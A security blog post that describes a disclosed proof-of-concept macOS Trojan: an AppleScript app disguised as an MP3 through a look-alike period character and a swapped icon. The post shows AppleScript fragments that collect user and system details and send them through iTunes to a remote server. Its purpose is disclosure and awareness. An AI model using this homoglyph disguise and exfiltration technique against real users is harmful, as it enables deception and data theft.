A recent report is stating that a Mac based Trojan attributed to the Syrian Electronic Army (SEA) was discovered, although not a lot of information regarding the malware has been provided, it should be noted that creating a Trojan for OS X is not particularly difficult.

A year or so ago I stumbled upon a way to create Trojans for OS X by utilizing homoglyphs and a bit of social engineering, I disclosed the vulnerability to Apple and presented it at ToorCamp.

I was able to show how it is  possible to create an binary that appears to the end user as a harmless file such as an MP3 file or image.

For my proof of concept I used AppleScript, as it is not only an easy way to create a Mac app, but also has hooks into all of the native Mac apps making it easy to control these applications for malicious purposes.

For a proof of concept I created an Applescript application that gathers information from the system, runs some shell scripts and then passes data from the device through iTunes to a remote server.

Creating the app was one thing, making it so that it tricked someone into clicking it was another. By default applications hide the “.app” extension on Macs¸ I wanted to disguise my Trojan as an MP3 so figured I could just change my file name to “.mp3,” however when you do this OS X knows you are up to no good and will then make the “.app” visible after your “.mp3″ alerting users to the fact that this file is in fact an application and not an MP3.

However this behavior only occurs with a period. As a workaround I found that if I use a Unicode character that appears similar to a period, OS X does not make the “.app” visible. I found a Turkish character called and ogonek (“¸”) that looks close enough to a period to fool most people using the default OS X system font:

OS X Filename Hack

I then changed the icon of my application to the standard MP3 icon and the disguise was complete. When the file is double clicked it would open iTunes and pass a URL with data encoded in the query string to a remote server where I logged the data collected from my semi-willing test victims.

The server would then stream the MP3 they were expecting to hear back through iTunes so they would not suspect what was happening on the back end. Using Applescript I was able to access pretty much all native OS X applications including iLife and iWork, as well as run shell scripts under whatever permissions the user had:

...
tell application "iTunes" 
	activate
	try
		open location trackingURLdata
	end try
end tell

do shell script "{insert shell commands of your choice}"
...

There is also a “sysinfo” object available in Applescript that provides extensive information about the system and user account that is easy to access:

set sysinfo to (system info) as record
set uname to long user name of sysinfo
set user to short user name of sysinfo
set cname to computer name of sysinfo
set sip to IPv4 address of sysinfo

To Apple’s credit they made “DeveloperID and Gatekeeper” available as of Mountain Lion which helps to mitigate the risk of this particular attack, but only if it is enabled:

OS X Gatekeeper

However, once unidentified applications were enabled on the device the Trojan worked perfectly. Older versions of OS X, Lion (10.7) and earlier do not have Gatekeeper and so will run the Trojan without error.

If the file is downloaded from the Internet a warning may appear telling the user the file was downloaded from the Internet, but I found the most people did not care and just clicked through without giving it another thought.

Utilizing a Mac Trojan in combination with a phishing attack would allow the attacker to sniff the version of OS X the user is running on the server and could swap out files based on those susceptible to it.

 

Related Articles:

 

P.S. Have you met John Powers, supernatural CISO?

Categories: ,

Tags: , , , , , , , , ,


Leave a Reply

Ken Westin

Ken Westin has contributed 100 posts to The State of Security.

View all posts by Ken Westin >